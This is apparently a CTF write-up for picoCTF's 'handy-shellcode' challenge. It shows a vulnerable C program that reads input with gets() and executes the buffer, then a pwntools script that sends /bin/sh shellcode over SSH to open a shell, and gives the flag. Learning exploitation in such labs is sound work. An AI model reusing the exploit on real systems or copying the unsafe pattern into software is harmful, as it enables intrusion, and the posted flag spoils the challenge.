picoCTF - handy-shellcode

 

 

 

 

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFSIZE 148
#define FLAGSIZE 128

void vuln(char *buf){
  gets(buf);
  puts(buf);
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);
  
  // Set the gid to the effective gid
  // this prevents /bin/sh from dropping the privileges
  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  char buf[BUFSIZE];

  puts("Enter your shellcode:");
  vuln(buf);

  puts("Thanks! Executing now...");
  
  ((void (*)())buf)();


  puts("Finishing Executing Shellcode. Exiting now...");
  
  return 0;
}

쉘 코드를 만들어 전달하기만 하면 된다.

 

 

 

 

from pwn import *

s = ssh(host = '2019shell1.picoctf.com', user = '', password = '')
s.set_working_directory('/problems/handy-shellcode_5_d1b3658f284f442eac06607b8ac4d1f5')
p = s.process('./vuln')

shellcode = asm(shellcraft.i386.linux.sh())

p.sendline(shellcode)

p.interactive()

 

 

 

 

Flag: picoCTF{h4ndY_d4ndY_sh311c0d3_0b440487}